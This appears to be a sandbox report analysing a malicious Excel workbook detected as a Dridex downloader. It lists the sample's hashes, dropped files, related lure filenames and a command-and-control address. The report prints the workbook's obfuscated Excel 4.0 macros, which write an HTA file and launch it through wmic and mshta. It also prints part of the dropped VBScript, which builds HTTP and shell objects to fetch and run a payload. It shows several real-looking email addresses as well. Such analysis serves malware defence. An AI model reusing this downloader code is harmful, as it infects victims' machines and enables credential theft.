                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal84.troj.expl.evad.winXLSB@5/9@0/1
                                                                                                                                                    EGA Information:Failed
                                                                                                                                                    HDC Information:Failed
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Adjust boot time
                                                                                                                                                    • Enable AMSI
                                                                                                                                                    • Found application associated with file extension: .xlsb
                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                    • Active AutoShape Object
                                                                                                                                                    • Active Picture Object
                                                                                                                                                    • Active Picture Object
                                                                                                                                                    • Scroll down
                                                                                                                                                    • Close Viewer
                                                                                                                                                    Warnings:
                                                                                                                                                    Show All
                                                                                                                                                    • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 40.126.31.8, 40.126.31.143, 20.190.159.134, 20.190.159.132, 40.126.31.137, 20.190.159.138, 40.126.31.135, 40.126.31.1, 23.35.237.194, 52.109.6.42, 52.109.12.24, 52.109.76.34, 20.54.110.249, 40.91.112.76
                                                                                                                                                    • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, prod-w.nexus.live.com.akadns.net, www.tm.lg.prod.aadmsa.akadns.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, storeedgefd.xbetservices.akadns.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, nexus.officeapps.live.com, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, storeedgefd.dsx.mp.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, www.tm.a.prd.aadg.akadns.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, login.msa.msidentity.com, store-images.s-microsoft.com, config.officeapps.live.com, us.configsvc1.live.com.akadns.net, e16646.dscg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

                                                                                                                                                    TimeTypeDescription
                                                                                                                                                    19:14:56API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                                                                                                    19:14:58API Interceptor1x Sleep call for process: mshta.exe modified

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    132.148.135.183Netflix coupon040693525.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                                                                                                                                                    Netflix coupon040693525.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                                                                                                                                                    request-377185.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                                                                                                                                                    Offer-04563360.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                                                                                                                                                    vote0882037.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                                                                                                                                                    vote0882037.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                                                                                                                                                    subscription-673890410.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                                                                                                                                                    subscription-673890410.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                                                                                                                                                    tax payment52023.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                                                                                                                                                    tax payment52023.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                                                                                                                                                    Offer 39052.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                                                                                                                                                    payment_646921.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                                                                                                                                                    payment_646921.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG

                                                                                                                                                    Domains

                                                                                                                                                    No context

                                                                                                                                                    ASN

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    GO-DADDY-COM-LLCUSpayment8642156.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    Netflix coupon040693525.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    Netflix coupon040693525.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    request-377185.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    Offer-04563360.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    vote0882037.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    vote0882037.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    subscription-673890410.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    subscription-673890410.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    tax payment52023.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    tax payment52023.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    Offer 39052.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    payment_646921.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    payment_646921.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 132.148.135.183
                                                                                                                                                    Arrival Notice, CIA Awb Inv Form.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                    • 184.168.98.97
                                                                                                                                                    Euro invoice.exeGet hashmaliciousBrowse
                                                                                                                                                    • 148.66.138.164
                                                                                                                                                    New Order778880.exeGet hashmaliciousBrowse
                                                                                                                                                    • 173.201.188.238
                                                                                                                                                    c0az1l4js3001lsk4xd9n.x86-20211124-0850Get hashmaliciousBrowse
                                                                                                                                                    • 192.169.147.26
                                                                                                                                                    Euro invoice.exeGet hashmaliciousBrowse
                                                                                                                                                    • 148.66.138.164
                                                                                                                                                    8pTiccdV2s.exeGet hashmaliciousBrowse
                                                                                                                                                    • 69.64.47.51

                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                    No context

                                                                                                                                                    Dropped Files

                                                                                                                                                    No context

                                                                                                                                                    Created / dropped Files

                                                                                                                                                    C:\ProgramData\XgQXeAWeoOU.rtf
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):5037
                                                                                                                                                    Entropy (8bit):5.071339310661895
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:UXZtsxeY/Z7R6d23YPsrILRpc+mTwgbfb+aDW/Cd3pNy:UbsxeY/Z7R6d23YGGpc+mTLQCd5g
                                                                                                                                                    MD5:3D6252D037CD3E30A4D97EADB9D3130E
                                                                                                                                                    SHA1:9C114500A3A22C0727E77E010845E1F0549F727D
                                                                                                                                                    SHA-256:6DF7D89ACBD338A4BFE1935484EB346EB9238828F247DE4BE33D4C80370E90FC
                                                                                                                                                    SHA-512:8EFED1A790D9C4808282C9BD05AE45F328A27AE780B69EAB0D4525DEB3591D6C3DC98F954A01B98A49F267D227B18A26AD3435E91F9DC9BD4677EF9CAFB4C973
                                                                                                                                                    Malicious:true
                                                                                                                                                    Yara Hits:
                                                                                                                                                    • Rule: JoeSecurity_DridexDownloader, Description: Yara detected Dridex Downloader, Source: C:\ProgramData\XgQXeAWeoOU.rtf, Author: Joe Security
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: <!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION ID="CS"..APPLICATIONNAME="ttrgnkrtegjtjgjerg"..WINDOWSTATE="minimize"..MAXIMIZEBUTTON="no"..MINIMIZEBUTTON="no"..CAPTION="no"..SHOWINTASKBAR="no">..<script type="text/vbscript" LANGUAGE="VBScript" >..A_O_P_Z_M_p_l_D_b_F_R_c_O_l = Chr(114+1-1) & "un" & "" & "dll" & "32" & ".e" & Chr(120+1-1) & "e " & "C:" & "\\P" & "" & "ro" & "gra" & "mDa" & Chr(116+1-1) & "a\" & "" & "tn" & "igg" & "er." & "bi" & Chr(110+1-1) & " Dl" & Chr(108+1-1) & "Re" & Chr(103+1-1) & "is" & "te" & Chr(114+1-1) & "Se" & "rve" & Chr(114+1-1)..Set X_t_z_c_Q_r_q_k_N_a_u_z_c_j = CreateObject("MS" & Chr(88+1-1) & "" & "ML2" & Chr(46+1-1) & Chr(83+1-1) & "erv" & "er" & "" & "XML" & "HTT" & Chr(80+1-1) & "" & ".6." & "" & Chr(48+1-1))....y_e_Y_W_L_J_p_v_I_G_L_O_n_f = Chr(87+1-1) & Chr(115+1-1) & "" & "" & "" & "" & "" & "cr" & Chr(105+1-1) & "pt" & Chr(46+1-1) & "" & "She" & Chr(108+1-1) & Chr(108+1-1)..Set Y_T_P_F_W_y_g_n_a_b_V_s_G = CreateObject(y_e_Y_W_L_J_p_v_I_G_L_O_
                                                                                                                                                    C:\ProgramData\pXJSNz.txt
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):122
                                                                                                                                                    Entropy (8bit):4.384694858980241
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:YBQyCHWX9LdIAWDZ+OSpIpiCpQVXPRki4+WNnKvdIHJslv5KI4:YC2NZIHE8pFpyxFkAcJER4
                                                                                                                                                    MD5:002908B7A86AA0ACAB2A864982F897A6
                                                                                                                                                    SHA1:A3DE267852CFF6FBB4FED36C1BD13C461081F776
                                                                                                                                                    SHA-256:9501698B0337928401A729DEAEA47CDDA07D43D8FD2810FA3D6C73419CB5EB7C
                                                                                                                                                    SHA-512:073749CA954F5A7B2B6DE341414A09E04806AB211B3A4CC87417DB7DE40FD54B3CBC84743E69CEFD8C00A05E0364C79FD072F1595607800FAA9E1406FBCCAF79
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: {"durst@hullforest.com","leslie@leslie-lewis.com","albert@fragaproperties.com","info@shopmotifs.com","awm@greenshpon.com"}
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\89313E5E-CC0C-4CD1-B945-313065E02B9E
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):140143
                                                                                                                                                    Entropy (8bit):5.35857900365598
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:VcQIfgxrBdA3gBwtnQ9DQW+z2b4Ff7nXbovidXiE6LWmE9:fuQ9DQW+zNXfH
                                                                                                                                                    MD5:8EF81FEEA25D4402BFEFC63F363752AD
                                                                                                                                                    SHA1:67A4C7B67E8B0B3C80B6F453F5A758142915FC86
                                                                                                                                                    SHA-256:A8E3E278CBB1CB5CD25CFE5EF06962D07E4506504EDC7BEE1DCC2575E473767A
                                                                                                                                                    SHA-512:6D0C1E4300AD129DBC4A181A2E30C324CAADC40ADE835EF05CEF486CF3661111616B9766E9D715DC5A263E040653919FE4459A34DDCC266717DA2B694E3C830A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-11-24T18:14:03">.. Build: 16.0.14715.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\274B0EB1.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 288 x 44, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2182
                                                                                                                                                    Entropy (8bit):7.855871655060478
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:X7LosLnezFsZnj7CkDROl5lcvGv6OmsfWCyzMLBv0i1Is6YCnw5:4sLeyZjrVOzlcvGCOwJzMFQs6A5
                                                                                                                                                    MD5:55D9AABD2A13AECF656987F081DC5824
                                                                                                                                                    SHA1:CA82AB022734F7D17EBE185A8C462CC8BD173ACF
                                                                                                                                                    SHA-256:C4D0B515DFE72D60051C4D7ACFA901AE46D05767F599C65AA035D8C9A89579E0
                                                                                                                                                    SHA-512:11A9619BB3BD1F7215382391CAFDCE0B2D29F15D51487BA72204D958CF55011D8B095CBD8596C470616D9B60DA4A68DC88AC37E40A90B205061D3A94D229FEBE
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: .PNG........IHDR... ...,.....JT.....MIDATx...{PT.....>X...\......DY0...#...M...h..`.m&cf.L...L....i.8..#c#6A..!."..m...U|..<...>..!7..6.T.........8....s...D.U. ..!~.. ...%.!.Q....%.!.Q....%.!.Q....%.!.Q....%.!.Q....%.!.Q....%.!.Q....%.!.Q....%.!.Iy.M?.qH...5...=/..NM.a..../U....V..v.n......=..m.....\a...?.0.......j...l..<...A....pb..n. U*.h......K..x...q.6.d.GF....v...o..c<:..z.>h/.h.....5.g..^..]...[..Z.F_b&.{{.a1].Q...i....qU...Y}."{Y..!s3.v..~.............l...%...p.....PT....iBe.... Q(.R..rP.4.X.@.)..*.....c6.SL./..%........../...H....X.......Og...##|..._1ibl.g.NK....T&%N.../?...\..Q....a.Y".D.._...i.>8}.7w..q.......u.P........[..K..tu.A"Q.L..*c6+...../*....9I....d......(U.0k..C.d!!.G.......'W.0.r...F..@.../.|..rr....+....`T..U+|.9....{%...x\....U....1hJ.a..rC..`...s.d*.gf....eb....s.........;.dr.......6...........?E.P....".....U#.U.,.68-.E.R.oSv........,...&m...O.b.....tL&.^.QU.0._}U"..#`2.>|./*.u0..(..}.9..X...D2...%..^.(.1[g.
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\55F344FE.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 237 x 336, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):60538
                                                                                                                                                    Entropy (8bit):7.970149181563435
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:2PFFxgFzx5YVqHS2YzayhpSW4vHR05Q4r5UZKUbD:RFzIsj8aipSW4vHREQ4iZKUbD
                                                                                                                                                    MD5:ABC5AD9147D307B1DADB93C7AF297C5A
                                                                                                                                                    SHA1:3658C7DDFA698CDADD1D24C6C8DC4ECF7A09D9E3
                                                                                                                                                    SHA-256:AEF2CEDE45970E5F0DCC40514D38B0D707A87FBC5943B61763EF20B4A8C0573F
                                                                                                                                                    SHA-512:D6F7C18AB4E132EAA0620FD83F7EE6C21F2B16ECA70267770C6F8499B18DEE24B3849E9ADDFAA76DA1A4CB13BDB81F1F49DF77CC3BF0146EE68E0CE6860839AA
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                    Preview: .PNG........IHDR.......P.....Sn.....JiCCPICC Profile..x..W.TS...[RIh..H...R.K..E..*..I ...D....]D@].U.E...ZQ...]......l..I.]=...s........{g...I.....y.|Y|D.kBj.......Z...x|...........7..../.(......'.... q.g...<......|..>Po=#_.. 6...!.*q...(q..W.l..9....L..dY.h7C=....y.o@.*..%..!..x..#!...7M...p...'....C.<^..V..r.X.....?..%/W1...6.H.......F.(%.A.#...X..wb...b.*RD&..QS...k.....x.Q..B......32..\...A....D..EByX...F6->v.g.8l....L.Wi.R.............D.).1j.89.bm...(..fS$.........m ..J"B...LYx..^.'...[$.sc4.*_........7..Y(a'.......s..C..c...$M.X.4?$^3..47Nc.S...J......\<0..H5?.#.KT.gd......A4..P....2.4....=M=.z$....d.!p.h.g..F$...._...|h^.jT.....V.t..........<..r.o.j.d.[2x.5...a...)...&Z.Q..t.-.a.Pb$1.....?.......>..`._..........N...b.7...8..=.kr..:g...z.!x...8.7...h..A.P..D...[....U.5v.W.J.F..8|;S.I.s.EY.+..5c.....o.s.....Q.Zb..}X.v.;.....;.5c..J<....V..xU<9.G..?....r.z.n..|a....8.3e.,Q>....B.W..9........;.~M.b.......]q............8........Z..
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7A5B4E7.tmp
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:Microsoft Excel 2007+
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):92621
                                                                                                                                                    Entropy (8bit):7.894555790746467
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:sbhf43n/TFqoN91PFFxgFzx5YVqHS2YzayhpSW4vHR05Q4r5UZKUbgnKgyd/s:IfKn7GFzIsj8aipSW4vHREQ4iZKUbgnL
                                                                                                                                                    MD5:28FB369DD7A71D4F012822D9A69CEDD4
                                                                                                                                                    SHA1:99492BC1C1469BF775809CB8C4FA9AFDEB730E8F
                                                                                                                                                    SHA-256:54FEF32F5F6C42E682D2B879601C9167C03B8DC00F4BBFC8A699AFF52E0942D5
                                                                                                                                                    SHA-512:93C7AE1FCCB972D93D63D407C9067693615AE7092F844DC46BEB62A4F318D2EF63450548347CD5454C9E961E84589CD3E392D2DD3DF1DC46A0E9349553236929
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: PK..........!.?...............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................U.n.0....?..."......C..=....=3..&...L".}....`.Vr......W.........;6.3.WA.....o.'.`.^K.<tl.....-...!..mr...@..'....vV!9..5.E..A.A\.f...>..m.1.r..V.....]&.....B.1..5JfJT<y....+..7...@.-wR.p....DR.q2~..A|.J~e.4"...d..K..^3'dM.7&..2..C.9.y..E.JFCs+S.).9#z+.....z..GF...?..v.....^C?..p...G..Czx..#.2....;E....^.$.CEF.d:. .u..........(.A=::...9..3..yk...C..=&CS'...i...._...0&..6..|.~$1..s.h..v....<.j...fq..%=...n#.....
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG[1].txt
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):122
                                                                                                                                                    Entropy (8bit):4.384694858980241
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:YBQyCHWX9LdIAWDZ+OSpIpiCpQVXPRki4+WNnKvdIHJslv5KI4:YC2NZIHE8pFpyxFkAcJER4
                                                                                                                                                    MD5:002908B7A86AA0ACAB2A864982F897A6
                                                                                                                                                    SHA1:A3DE267852CFF6FBB4FED36C1BD13C461081F776
                                                                                                                                                    SHA-256:9501698B0337928401A729DEAEA47CDDA07D43D8FD2810FA3D6C73419CB5EB7C
                                                                                                                                                    SHA-512:073749CA954F5A7B2B6DE341414A09E04806AB211B3A4CC87417DB7DE40FD54B3CBC84743E69CEFD8C00A05E0364C79FD072F1595607800FAA9E1406FBCCAF79
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: {"durst@hullforest.com","leslie@leslie-lewis.com","albert@fragaproperties.com","info@shopmotifs.com","awm@greenshpon.com"}
                                                                                                                                                    C:\Users\user\Desktop\~$payment8642156.xlsb
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):165
                                                                                                                                                    Entropy (8bit):1.6081032063576088
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                    MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                    SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                    SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                    SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                    Malicious:true
                                                                                                                                                    Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                    \Device\ConDrv
                                                                                                                                                    Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                    File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):160
                                                                                                                                                    Entropy (8bit):5.095703110114614
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MglViE36JQAiveyzr:Yw7gJGWMXJXKSOdYiygKkXe/egaEqeAc
                                                                                                                                                    MD5:1392C10E58AC673A40CC8EC03AA5CBFE
                                                                                                                                                    SHA1:4D672FBEDF8B9230ABA0BBE9CA78CB15AFC94A6F
                                                                                                                                                    SHA-256:873EB09B3879835EA3753ED7F90BBAD42121A16EDD2FD32CFB8F6A089F5258DF
                                                                                                                                                    SHA-512:106249C632B0E2A6422C57C32FAD335EA38A16558CD783BA60995AE3FC391187D3AD1BFF6E66299E6B79AB0C944AE8F8A9936ED5AFB0615482BBFA53237993AD
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 7096;...ReturnValue = 0;..};....

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:Microsoft Excel 2007+
                                                                                                                                                    Entropy (8bit):7.904015574905514
                                                                                                                                                    TrID:
                                                                                                                                                    • Excel Microsoft Office Open XML Format document with Macro (51004/1) 36.56%
                                                                                                                                                    • Microsoft Excel Office Binary workbook document (40504/1) 29.03%
                                                                                                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 28.67%
                                                                                                                                                    • ZIP compressed archive (8000/1) 5.73%
                                                                                                                                                    File name:payment8642156.xlsb
                                                                                                                                                    File size:92756
                                                                                                                                                    MD5:c0ba3e41c19da601eb852e9cd468012b
                                                                                                                                                    SHA1:151cad874dce5400b1cdb1a4f6114c296311f76a
                                                                                                                                                    SHA256:56e7b2005961a0726ac94e50ed03bfcad15700e3aee1be840ee2b827f7798680
                                                                                                                                                    SHA512:1f7dbae3767c60853c3c700fac4d14aa93de207cffc540d100502eeb3ac9f78a9a37c3cd4aa63007cbb89f4820943b85d187108101a12f6308c1a4c9490e0962
                                                                                                                                                    SSDEEP:1536:UW3PFFxgFzx5YVqHS2YzayhpSW4vHR05Q4r5UZKUbtzBTt/4Y3dJnHgdA:VyFzIsj8aipSW4vHREQ4iZKUb9/4Y3jF
                                                                                                                                                    File Content Preview:PK..........!...l.....W.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                    Static OLE Info

                                                                                                                                                    General

                                                                                                                                                    Document Type:OpenXML
                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                    OLE File "payment8642156.xlsb"

                                                                                                                                                    Indicators

                                                                                                                                                    Has Summary Info:
                                                                                                                                                    Application Name:
                                                                                                                                                    Encrypted Document:
                                                                                                                                                    Contains Word Document Stream:
                                                                                                                                                    Contains Workbook/Book Stream:
                                                                                                                                                    Contains PowerPoint Document Stream:
                                                                                                                                                    Contains Visio Document Stream:
                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                    Flash Objects Count:
                                                                                                                                                    Contains VBA Macros:

                                                                                                                                                    Macro 4.0 Code

                                                                                                                                                    0,564,=FOPEN(CHAR(67) & ":\Pr" & CHAR(111) & "gramData\XgQXeAWeo" & CHAR(79) & "U.rt" & CHAR(102) & "", 3)
                                                                                                                                                    1,564,=D5673+A4881
                                                                                                                                                    2,564,=B5015+A1252
                                                                                                                                                    5,564,=A9794+D9941
                                                                                                                                                    7,564,=C7294+B4704
                                                                                                                                                    8,564,=B8908+D6425
                                                                                                                                                    9,564,=D4166+B8999
                                                                                                                                                    10,564,=C5227+A9819
                                                                                                                                                    11,564,=D9330+D5721
                                                                                                                                                    12,564,=FOR.CELL("JWGrekvAclvvC",Sheet1!AZ170:BV388, TRUE)
                                                                                                                                                    13,564,=D2725+A4790
                                                                                                                                                    14,564,=B5224+D865
                                                                                                                                                    16,564,=B6557+C592
                                                                                                                                                    18,564,=A4462+C6954
                                                                                                                                                    24,564,=C7543+C3984
                                                                                                                                                    25,564,=FWRITE(0,CHAR(JWGrekvAclvvC))
                                                                                                                                                    26,564,=B6577+D7641
                                                                                                                                                    27,564,=B9231+A109
                                                                                                                                                    28,564,=C5152+A6105
                                                                                                                                                    29,564,=C9330+C4538
                                                                                                                                                    32,564,=D8363+D5837
                                                                                                                                                    38,564,=C3484+C4052
                                                                                                                                                    39,564,=NEXT()
                                                                                                                                                    41,564,=C1056+A5025
                                                                                                                                                    45,564,=A9310+A6516
                                                                                                                                                    48,564,=B6305+D8805
                                                                                                                                                    50,564,=B1275+A6853
                                                                                                                                                    53,564,=EXEC(CHAR(119) & CHAR(109) & "ic" & CHAR(32) & CHAR(112) & "ro" & CHAR(99) & "ess call cr" & CHAR(101) & "ate" & CHAR(32) & CHAR(34) & CHAR(109) & CHAR(115) & CHAR(104) & CHAR(116) & "a C:\Pr" & CHAR(111) & "" & CHAR(103) & "ram" & CHAR(68) & "ata" & CHAR(92) & CHAR(88) & "" & CHAR(103) & "" & CHAR(81) & "" & CHAR(88) & "eAWe" & CHAR(111) & CHAR(79) & "U.r" & CHAR(116) & "" & CHAR(102) & "" & CHAR(34))
                                                                                                                                                    54,564,=A4137+B9753
                                                                                                                                                    55,564,=A5047+C8222
